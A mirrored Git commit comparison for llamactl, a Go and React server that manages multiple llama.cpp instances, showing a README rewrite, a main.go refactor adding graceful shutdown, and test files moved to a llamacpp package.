mirror of
https://github.com/lordmathis/llamactl.git
synced 2025-11-06 09:04:27 +00:00
Compare commits
24 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 8d9c808be1 | |||
| 161cd213c5 | |||
| d6e84f0527 | |||
| 0846350d41 | |||
| dacaca8594 | |||
| 6e3f5cec61 | |||
| 85b3638efb | |||
| 934d1c5aaa | |||
| 2abe9c282e | |||
| 6a7a9a2d09 | |||
| a3c44dad1e | |||
| 7426008ef9 | |||
| cf26aa521a | |||
| d94c922314 | |||
| 3cbd23a6e2 | |||
| bed172bf73 | |||
| d449255bc9 | |||
| de89d0673a | |||
| dd6ffa548c | |||
| 7935f19cc1 | |||
| f1718198a3 | |||
| b24d744cad | |||
| fff8b2dbde | |||
| b94909dee4 |
295
README.md
295
README.md
@@ -2,93 +2,151 @@
|
|||||||
|
|
||||||
  
|
  
|
||||||
|
|
||||||
A control server for managing multiple Llama Server instances with a web-based dashboard.
|
**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.**
|
||||||
|
|
||||||
## Features
|
## Why llamactl?
|
||||||
|
|
||||||
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
|
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
|
||||||
- **Web Dashboard**: Modern React-based UI for managing instances
|
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
|
||||||
- **Auto-restart**: Configurable automatic restart on instance failure
|
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
|
||||||
- **Instance Monitoring**: Real-time health checks and status monitoring
|
🔐 **API Key Authentication**: Separate keys for management vs inference access
|
||||||
- **Log Management**: View, search, and download instance logs
|
📊 **Instance Monitoring**: Health checks, auto-restart, log management
|
||||||
- **REST API**: Full API for programmatic control
|
⚡ **Persistent State**: Instances survive server restarts
|
||||||
- **OpenAI Compatible**: Route requests to instances by instance name
|
|
||||||
- **Configuration Management**: Comprehensive llama-server parameter support
|
|
||||||
- **System Information**: View llama-server version, devices, and help
|
|
||||||
|
|
||||||
## Prerequisites
|
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
|
||||||
|
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
|
||||||
|
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
|
||||||
|
|
||||||
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
|
## Quick Start
|
||||||
|
|
||||||
**Install llama.cpp:**
|
```bash
|
||||||
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
|
# 1. Install llama-server (one-time setup)
|
||||||
|
# See: https://github.com/ggml-org/llama.cpp#quick-start
|
||||||
|
|
||||||
|
# 2. Download and run llamactl
|
||||||
|
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||||
|
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
|
||||||
|
sudo mv llamactl /usr/local/bin/
|
||||||
|
|
||||||
|
# 3. Start the server
|
||||||
|
llamactl
|
||||||
|
# Access dashboard at http://localhost:8080
|
||||||
|
```
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
### Create and manage instances via web dashboard:
|
||||||
|
1. Open http://localhost:8080
|
||||||
|
2. Click "Create Instance"
|
||||||
|
3. Set model path and GPU layers
|
||||||
|
4. Start or stop the instance
|
||||||
|
|
||||||
|
### Or use the REST API:
|
||||||
|
```bash
|
||||||
|
# Create instance
|
||||||
|
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
|
||||||
|
-H "Authorization: Bearer your-key" \
|
||||||
|
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
|
||||||
|
|
||||||
|
# Use with OpenAI SDK
|
||||||
|
curl -X POST localhost:8080/v1/chat/completions \
|
||||||
|
-H "Authorization: Bearer your-key" \
|
||||||
|
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
|
||||||
|
```
|
||||||
|
|
||||||
## Installation
|
## Installation
|
||||||
|
|
||||||
### Build Requirements
|
### Option 1: Download Binary (Recommended)
|
||||||
|
|
||||||
- Go 1.24 or later
|
|
||||||
- Node.js 22 or later (for building the web UI)
|
|
||||||
|
|
||||||
### Building with Web UI
|
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
# Clone the repository
|
# Linux/macOS - Get latest version and download
|
||||||
|
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||||
|
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
|
||||||
|
sudo mv llamactl /usr/local/bin/
|
||||||
|
|
||||||
|
# Or download manually from the releases page:
|
||||||
|
# https://github.com/lordmathis/llamactl/releases/latest
|
||||||
|
|
||||||
|
# Windows - Download from releases page
|
||||||
|
```
|
||||||
|
|
||||||
|
### Option 2: Build from Source
|
||||||
|
Requires Go 1.24+ and Node.js 22+
|
||||||
|
```bash
|
||||||
git clone https://github.com/lordmathis/llamactl.git
|
git clone https://github.com/lordmathis/llamactl.git
|
||||||
cd llamactl
|
cd llamactl
|
||||||
|
cd webui && npm ci && npm run build && cd ..
|
||||||
# Install Node.js dependencies
|
|
||||||
cd webui
|
|
||||||
npm ci
|
|
||||||
|
|
||||||
# Build the web UI
|
|
||||||
npm run build
|
|
||||||
|
|
||||||
# Return to project root and build
|
|
||||||
cd ..
|
|
||||||
go build -o llamactl ./cmd/server
|
go build -o llamactl ./cmd/server
|
||||||
|
```
|
||||||
|
|
||||||
# Run the server
|
## Prerequisites
|
||||||
./llamactl
|
|
||||||
|
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Quick install methods:
|
||||||
|
# Homebrew (macOS)
|
||||||
|
brew install llama.cpp
|
||||||
|
|
||||||
|
# Or build from source - see llama.cpp docs
|
||||||
```
|
```
|
||||||
|
|
||||||
## Configuration
|
## Configuration
|
||||||
|
|
||||||
|
llamactl works out of the box with sensible defaults.
|
||||||
|
|
||||||
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
|
```yaml
|
||||||
|
server:
|
||||||
|
host: "0.0.0.0" # Server host to bind to
|
||||||
|
port: 8080 # Server port to bind to
|
||||||
|
allowed_origins: ["*"] # Allowed CORS origins (default: all)
|
||||||
|
enable_swagger: false # Enable Swagger UI for API docs
|
||||||
|
|
||||||
1. Hardcoded defaults
|
instances:
|
||||||
2. Configuration file
|
port_range: [8000, 9000] # Port range for instances
|
||||||
3. Environment variables
|
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
|
||||||
|
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
|
||||||
|
logs_dir: ~/.local/share/llamactl/logs # Logs directory
|
||||||
|
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
|
||||||
|
max_instances: -1 # Max instances (-1 = unlimited)
|
||||||
|
llama_executable: llama-server # Path to llama-server executable
|
||||||
|
default_auto_restart: true # Auto-restart new instances by default
|
||||||
|
default_max_restarts: 3 # Max restarts for new instances
|
||||||
|
default_restart_delay: 5 # Restart delay (seconds) for new instances
|
||||||
|
|
||||||
|
auth:
|
||||||
|
require_inference_auth: true # Require auth for inference endpoints
|
||||||
|
inference_keys: [] # Keys for inference endpoints
|
||||||
|
require_management_auth: true # Require auth for management endpoints
|
||||||
|
management_keys: [] # Keys for management endpoints
|
||||||
|
```
|
||||||
|
|
||||||
|
<details><summary><strong>Full Configuration Guide</strong></summary>
|
||||||
|
|
||||||
|
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
|
||||||
|
|
||||||
|
```
|
||||||
|
Defaults < Configuration file < Environment variables
|
||||||
|
```
|
||||||
|
|
||||||
### Configuration Files
|
### Configuration Files
|
||||||
|
|
||||||
Configuration files are searched in the following locations:
|
#### Configuration File Locations
|
||||||
|
|
||||||
|
Configuration files are searched in the following locations (in order of precedence):
|
||||||
|
|
||||||
**Linux/macOS:**
|
**Linux/macOS:**
|
||||||
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
||||||
- `~/.config/llamactl/config.yaml`
|
- `$HOME/.config/llamactl/config.yaml`
|
||||||
- `/etc/llamactl/config.yaml`
|
- `/etc/llamactl/config.yaml`
|
||||||
|
|
||||||
**Windows:**
|
**Windows:**
|
||||||
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
||||||
- `%APPDATA%\llamactl\config.yaml`
|
- `%APPDATA%\llamactl\config.yaml`
|
||||||
|
- `%USERPROFILE%\llamactl\config.yaml`
|
||||||
- `%PROGRAMDATA%\llamactl\config.yaml`
|
- `%PROGRAMDATA%\llamactl\config.yaml`
|
||||||
|
|
||||||
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
|
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
|
||||||
|
|
||||||
## API Key Authentication
|
|
||||||
|
|
||||||
llamactl now supports API Key authentication for both management and inference (OpenAI-compatible) endpoints. The are separate keys for management and inference APIs. Management keys grant full access; inference keys grant access to OpenAI-compatible endpoints
|
|
||||||
|
|
||||||
**How to Use:**
|
|
||||||
- Pass your API key in requests using one of:
|
|
||||||
- `Authorization: Bearer <key>` header
|
|
||||||
- `X-API-Key: <key>` header
|
|
||||||
- `api_key=<key>` query parameter
|
|
||||||
|
|
||||||
**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
|
|
||||||
|
|
||||||
### Configuration Options
|
### Configuration Options
|
||||||
|
|
||||||
@@ -112,8 +170,11 @@ server:
|
|||||||
|
|
||||||
```yaml
|
```yaml
|
||||||
instances:
|
instances:
|
||||||
port_range: [8000, 9000] # Port range for instances
|
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
|
||||||
log_directory: "/tmp/llamactl" # Directory for instance logs
|
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
|
||||||
|
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
|
||||||
|
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
|
||||||
|
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
|
||||||
max_instances: -1 # Maximum instances (-1 = unlimited)
|
max_instances: -1 # Maximum instances (-1 = unlimited)
|
||||||
llama_executable: "llama-server" # Path to llama-server executable
|
llama_executable: "llama-server" # Path to llama-server executable
|
||||||
default_auto_restart: true # Default auto-restart setting
|
default_auto_restart: true # Default auto-restart setting
|
||||||
@@ -123,14 +184,17 @@ instances:
|
|||||||
|
|
||||||
**Environment Variables:**
|
**Environment Variables:**
|
||||||
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
|
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
|
||||||
- `LLAMACTL_LOG_DIR` - Log directory path
|
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
|
||||||
|
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
|
||||||
|
- `LLAMACTL_LOGS_DIR` - Log directory path
|
||||||
|
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
|
||||||
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
|
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
|
||||||
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
|
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
|
||||||
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
|
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
|
||||||
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
|
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
|
||||||
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
|
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
|
||||||
|
|
||||||
#### Auth Configuration
|
#### Authentication Configuration
|
||||||
|
|
||||||
```yaml
|
```yaml
|
||||||
auth:
|
auth:
|
||||||
@@ -146,121 +210,8 @@ auth:
|
|||||||
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
|
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
|
||||||
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
|
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
|
||||||
|
|
||||||
### Example Configuration
|
</details>
|
||||||
|
|
||||||
```yaml
|
|
||||||
server:
|
|
||||||
host: "0.0.0.0"
|
|
||||||
port: 8080
|
|
||||||
|
|
||||||
instances:
|
|
||||||
port_range: [8001, 8100]
|
|
||||||
log_directory: "/var/log/llamactl"
|
|
||||||
max_instances: 10
|
|
||||||
llama_executable: "/usr/local/bin/llama-server"
|
|
||||||
default_auto_restart: true
|
|
||||||
default_max_restarts: 5
|
|
||||||
default_restart_delay: 10
|
|
||||||
|
|
||||||
auth:
|
|
||||||
require_inference_auth: true
|
|
||||||
inference_keys: ["sk-inference-abc123"]
|
|
||||||
require_management_auth: true
|
|
||||||
management_keys: ["sk-management-xyz456"]
|
|
||||||
```
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
### Starting the Server
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Start with default configuration
|
|
||||||
./llamactl
|
|
||||||
|
|
||||||
# Start with custom config file
|
|
||||||
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
|
|
||||||
|
|
||||||
# Start with environment variables
|
|
||||||
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
|
|
||||||
```
|
|
||||||
|
|
||||||
### Web Dashboard
|
|
||||||
|
|
||||||
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
|
|
||||||
|
|
||||||
### API Usage
|
|
||||||
|
|
||||||
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
|
|
||||||
|
|
||||||
#### Create an Instance
|
|
||||||
|
|
||||||
```bash
|
|
||||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
|
|
||||||
-H "Content-Type: application/json" \
|
|
||||||
-d '{
|
|
||||||
"model": "/path/to/model.gguf",
|
|
||||||
"gpu_layers": 32,
|
|
||||||
"auto_restart": true
|
|
||||||
}'
|
|
||||||
```
|
|
||||||
|
|
||||||
#### List Instances
|
|
||||||
|
|
||||||
```bash
|
|
||||||
curl http://localhost:8080/api/v1/instances
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Start/Stop Instance
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Start
|
|
||||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
|
|
||||||
|
|
||||||
# Stop
|
|
||||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
|
|
||||||
```
|
|
||||||
|
|
||||||
### OpenAI Compatible Endpoints
|
|
||||||
|
|
||||||
Route requests to instances by including the instance name as the model parameter:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
curl -X POST http://localhost:8080/v1/chat/completions \
|
|
||||||
-H "Content-Type: application/json" \
|
|
||||||
-d '{
|
|
||||||
"model": "my-instance",
|
|
||||||
"messages": [{"role": "user", "content": "Hello!"}]
|
|
||||||
}'
|
|
||||||
```
|
|
||||||
|
|
||||||
## Development
|
|
||||||
|
|
||||||
### Running Tests
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Go tests
|
|
||||||
go test ./...
|
|
||||||
|
|
||||||
# Web UI tests
|
|
||||||
cd webui
|
|
||||||
npm test
|
|
||||||
```
|
|
||||||
|
|
||||||
### Development Server
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Start Go server in development mode
|
|
||||||
go run ./cmd/server
|
|
||||||
|
|
||||||
# Start web UI development server (in another terminal)
|
|
||||||
cd webui
|
|
||||||
npm run dev
|
|
||||||
```
|
|
||||||
|
|
||||||
## API Documentation
|
|
||||||
|
|
||||||
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
|
|
||||||
|
|
||||||
## License
|
## License
|
||||||
|
|
||||||
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
|
MIT License - see [LICENSE](LICENSE) file.
|
||||||
|
|||||||
@@ -2,9 +2,13 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
llamactl "llamactl/pkg"
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/manager"
|
||||||
|
"llamactl/pkg/server"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os"
|
"os"
|
||||||
|
"os/signal"
|
||||||
|
"syscall"
|
||||||
)
|
)
|
||||||
|
|
||||||
// @title llamactl API
|
// @title llamactl API
|
||||||
@@ -15,29 +19,63 @@ import (
|
|||||||
// @basePath /api/v1
|
// @basePath /api/v1
|
||||||
func main() {
|
func main() {
|
||||||
|
|
||||||
config, err := llamactl.LoadConfig("")
|
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
|
||||||
|
cfg, err := config.LoadConfig(configPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
fmt.Printf("Error loading config: %v\n", err)
|
fmt.Printf("Error loading config: %v\n", err)
|
||||||
fmt.Println("Using default configuration.")
|
fmt.Println("Using default configuration.")
|
||||||
}
|
}
|
||||||
|
|
||||||
// Create the log directory if it doesn't exist
|
// Create the data directory if it doesn't exist
|
||||||
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
|
if cfg.Instances.AutoCreateDirs {
|
||||||
if err != nil {
|
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
|
||||||
fmt.Printf("Error creating log directory: %v\n", err)
|
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
|
||||||
return
|
fmt.Println("Persistence will not be available.")
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
|
||||||
|
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
|
||||||
|
fmt.Println("Instance logs will not be available.")
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Initialize the instance manager
|
// Initialize the instance manager
|
||||||
instanceManager := llamactl.NewInstanceManager(config.Instances)
|
instanceManager := manager.NewInstanceManager(cfg.Instances)
|
||||||
|
|
||||||
// Create a new handler with the instance manager
|
// Create a new handler with the instance manager
|
||||||
handler := llamactl.NewHandler(instanceManager, config)
|
handler := server.NewHandler(instanceManager, cfg)
|
||||||
|
|
||||||
// Setup the router with the handler
|
// Setup the router with the handler
|
||||||
r := llamactl.SetupRouter(handler)
|
r := server.SetupRouter(handler)
|
||||||
|
|
||||||
// Start the server with the router
|
// Handle graceful shutdown
|
||||||
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
|
stop := make(chan os.Signal, 1)
|
||||||
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
|
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
|
||||||
|
|
||||||
|
server := http.Server{
|
||||||
|
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
|
||||||
|
Handler: r,
|
||||||
|
}
|
||||||
|
|
||||||
|
go func() {
|
||||||
|
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
|
||||||
|
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
|
||||||
|
fmt.Printf("Error starting server: %v\n", err)
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
|
||||||
|
// Wait for shutdown signal
|
||||||
|
<-stop
|
||||||
|
fmt.Println("Shutting down server...")
|
||||||
|
|
||||||
|
if err := server.Close(); err != nil {
|
||||||
|
fmt.Printf("Error shutting down server: %v\n", err)
|
||||||
|
} else {
|
||||||
|
fmt.Println("Server shut down gracefully.")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait for all instances to stop
|
||||||
|
instanceManager.Shutdown()
|
||||||
|
|
||||||
|
fmt.Println("Exiting llamactl.")
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package llamacpp
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
@@ -1,17 +1,16 @@
|
|||||||
package llamactl_test
|
package llamacpp_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
"reflect"
|
"reflect"
|
||||||
"slices"
|
"slices"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
|||||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
options llamactl.LlamaServerOptions
|
options llamacpp.LlamaServerOptions
|
||||||
expected []string
|
expected []string
|
||||||
excluded []string
|
excluded []string
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
name: "verbose true",
|
name: "verbose true",
|
||||||
options: llamactl.LlamaServerOptions{
|
options: llamacpp.LlamaServerOptions{
|
||||||
Verbose: true,
|
Verbose: true,
|
||||||
},
|
},
|
||||||
expected: []string{"--verbose"},
|
expected: []string{"--verbose"},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "verbose false",
|
name: "verbose false",
|
||||||
options: llamactl.LlamaServerOptions{
|
options: llamacpp.LlamaServerOptions{
|
||||||
Verbose: false,
|
Verbose: false,
|
||||||
},
|
},
|
||||||
excluded: []string{"--verbose"},
|
excluded: []string{"--verbose"},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "multiple booleans",
|
name: "multiple booleans",
|
||||||
options: llamactl.LlamaServerOptions{
|
options: llamacpp.LlamaServerOptions{
|
||||||
Verbose: true,
|
Verbose: true,
|
||||||
FlashAttn: true,
|
FlashAttn: true,
|
||||||
Mlock: false,
|
Mlock: false,
|
||||||
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
Threads: 4,
|
Threads: 4,
|
||||||
CtxSize: 2048,
|
CtxSize: 2048,
|
||||||
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
Port: 0, // Should be excluded
|
Port: 0, // Should be excluded
|
||||||
Threads: 0, // Should be excluded
|
Threads: 0, // Should be excluded
|
||||||
Temperature: 0, // Should be excluded
|
Temperature: 0, // Should be excluded
|
||||||
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||||
DrySequenceBreaker: []string{".", "!", "?"},
|
DrySequenceBreaker: []string{".", "!", "?"},
|
||||||
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
Lora: []string{}, // Empty array should not generate args
|
Lora: []string{}, // Empty array should not generate args
|
||||||
OverrideTensor: []string{}, // Empty array should not generate args
|
OverrideTensor: []string{}, // Empty array should not generate args
|
||||||
}
|
}
|
||||||
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
|||||||
|
|
||||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||||
// Test snake_case to kebab-case conversion
|
// Test snake_case to kebab-case conversion
|
||||||
options := llamactl.LlamaServerOptions{
|
options := llamacpp.LlamaServerOptions{
|
||||||
CtxSize: 4096,
|
CtxSize: 4096,
|
||||||
GPULayers: 32,
|
GPULayers: 32,
|
||||||
ThreadsBatch: 2,
|
ThreadsBatch: 2,
|
||||||
@@ -235,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
|||||||
"temperature": 0.7
|
"temperature": 0.7
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var options llamactl.LlamaServerOptions
|
var options llamacpp.LlamaServerOptions
|
||||||
err := json.Unmarshal([]byte(jsonData), &options)
|
err := json.Unmarshal([]byte(jsonData), &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("Unmarshal failed: %v", err)
|
t.Fatalf("Unmarshal failed: %v", err)
|
||||||
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
jsonData string
|
jsonData string
|
||||||
checkFn func(llamactl.LlamaServerOptions) error
|
checkFn func(llamacpp.LlamaServerOptions) error
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
name: "threads alternatives",
|
name: "threads alternatives",
|
||||||
jsonData: `{"t": 4, "tb": 2}`,
|
jsonData: `{"t": 4, "tb": 2}`,
|
||||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||||
if opts.Threads != 4 {
|
if opts.Threads != 4 {
|
||||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||||
}
|
}
|
||||||
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "context size alternatives",
|
name: "context size alternatives",
|
||||||
jsonData: `{"c": 2048}`,
|
jsonData: `{"c": 2048}`,
|
||||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||||
if opts.CtxSize != 2048 {
|
if opts.CtxSize != 2048 {
|
||||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||||
}
|
}
|
||||||
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "gpu layers alternatives",
|
name: "gpu layers alternatives",
|
||||||
jsonData: `{"ngl": 16}`,
|
jsonData: `{"ngl": 16}`,
|
||||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||||
if opts.GPULayers != 16 {
|
if opts.GPULayers != 16 {
|
||||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||||
}
|
}
|
||||||
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
|||||||
{
|
{
|
||||||
name: "model alternatives",
|
name: "model alternatives",
|
||||||
jsonData: `{"m": "/path/model.gguf"}`,
|
jsonData: `{"m": "/path/model.gguf"}`,
|
||||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||||
